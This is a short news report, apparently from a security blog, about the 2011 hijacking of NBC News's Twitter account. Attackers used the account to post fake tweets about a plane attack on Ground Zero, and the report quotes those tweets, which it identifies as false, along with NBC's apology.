<a href=">IE Flaw Can Cause Zero-Day Exploit"https://www.voiceofgreyhat.com/2011/05/ie-flaw-can-cause-zero-day-exploit.html</a>

Twitter Account of NBC News Hacked

Hackers compromised the NBC News Twitter account today and sent several fake tweets from the account about an attack on Ground Zero reminiscent of the attacks of September 11, 2001.

"Breaking News! Ground Zero has just been attacked. Flight 5736 has crashed into the site, suspected hijacking. More as the story develops," was the first tweet this afternoon. It was followed by two others, including one that started "This is not a joke."

The fourth tweet said "NBCNEWS hacked by The Script Kiddies."

An e-mailed NBC News statement said: "The NBC News twitter account was hacked late this afternoon and as a result, false reports of a plane attack on ground zero were sent to @NBCNews followers. We are working with Twitter to correct the situation and sincerely apologize for the scare that could have been caused by such a reckless and irresponsible act."

NBC News also used the Twitter account of its chief digital officer, Vivian Schiller, to alert followers to the problem. "Ignore tweets from @nbcnews till further notice. We've been hacked. Do not retweet," her account tweeted shortly early on. A search for the NBC News Twitter profile shortly thereafter displayed the message "This user does not exist."

It's unclear who the Script Kiddies are. The profile for the Script Kiddies--a term used to describe novice hackers--also appeared to have been removed from Twitter.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Twitter Account of NBC News Hacked"https://www.voiceofgreyhat.com/2011/09/twitter-account-of-nbc-news-hacked.html</a>